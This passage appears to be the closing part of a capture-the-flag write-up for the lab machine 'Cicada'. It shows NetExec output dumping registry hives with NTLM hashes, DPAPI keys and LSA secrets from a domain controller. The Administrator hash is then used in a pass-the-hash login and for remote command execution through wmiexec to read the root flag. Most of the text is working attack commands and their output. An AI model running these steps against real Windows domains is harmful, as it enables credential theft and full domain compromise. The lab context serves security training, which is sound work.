BACKUP_O... 10.10.11.35 445 CICADA-DC Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
BACKUP_O... 10.10.11.35 445 CICADA-DC Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
BACKUP_O... 10.10.11.35 445 CICADA-DC DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
BACKUP_O... 10.10.11.35 445 CICADA-DC $MACHINE.ACC:plain_password_hex:6209748a5ab74c44bd98fc5015b6646467841a634c4a1b2d6733289c33f76fc6427f7ccd8f6d978a79eec3ae49eb8c0b5b14e193ec484ea1152e8a04e01a3403b3111c0373d126a566660a7dd083aec1921d53a82bc5129408627ae5be5e945ed58cfb77a2a50e9ffe7e6a4531febd965181e528815d264885921118fb7a74eff51306dbffa4d6a0c995be5c35063576fc4a3eba39d0168d4601da0a0c12748ae870ff36d7fb044649032f550f04c017f6d94675b3517d06450561c71ddf8734100898bf2c19359c69d1070977f070e3b8180210a92488534726005588c0f269a7e182c3c04b96f7b5bc4af488e128f8
BACKUP_O... 10.10.11.35 445 CICADA-DC $MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:188c2f3cb7592e18d1eae37991dee696
BACKUP_O... 10.10.11.35 445 CICADA-DC dpapi_machinekey:0x0e3d4a419282c47327eb03989632b3bef8998f71
dpapi_userkey:0x4bb80d985193ae360a4d97f3ca06350b02549fbb
BACKUP_O... 10.10.11.35 445 CICADA-DC NL$KM:cc1501f764391e7a5e538cc174e62b01369b50b8d07223d9b6c56e922f5708d81eba8e8123250327364c19b496cd251f8ff97f5d71e66e8cffcbeb5e4ea4e696
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\Administrator:2b87e7c93a3e8a0ea4a581937016f341 (Pwn3d!)
BACKUP_O... 10.10.11.35 445 CICADA-DC [*] Dumping NTDS...
SMB 10.10.11.35 445 CICADA-DC [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.10.11.35 445 CICADA-DC [-] Could not connect: timed out
BACKUP_O... 10.10.11.35 445 CICADA-DC [*] Cleaning dump with user Administrator and hash 2b87e7c93a3e8a0ea4a581937016f341 on domain cicada.htb
BACKUP_O... 10.10.11.35 445 CICADA-DC [*] Successfully deleted dump files !

This module handles everything for us: it saves the SAM, SYSTEM and SECURITY hives to SYSVOL, downloads them, and extracts the hashes. Even though the NTDS dump timed out, the Administrator hash recovered from the SAM hive is enough, and the module cleans up the dump files afterwards. We can use this hash to log in to the box and read the root flag.

➜  nxc smb 10.10.11.35 -u administrator -H 2b87e7c93a3e8a0ea4a581937016f341
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\administrator:2b87e7c93a3e8a0ea4a581937016f341 (Pwn3d!)

In fact, why even bother logging into the box when we can just grab the flag directly with -x, which runs a command through wmiexec? (Thanks to Pwn3d! 😎)

➜  nxc smb 10.10.11.35 -u administrator -H 2b87e7c93a3e8a0ea4a581937016f341 -x 'type \users\administrator\desktop\root.txt'
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\administrator:2b87e7c93a3e8a0ea4a581937016f341 (Pwn3d!)
SMB 10.10.11.35 445 CICADA-DC [+] Executed command via wmiexec
SMB 10.10.11.35 445 CICADA-DC 56662e5d83f25a4649005343c5f33997

Resources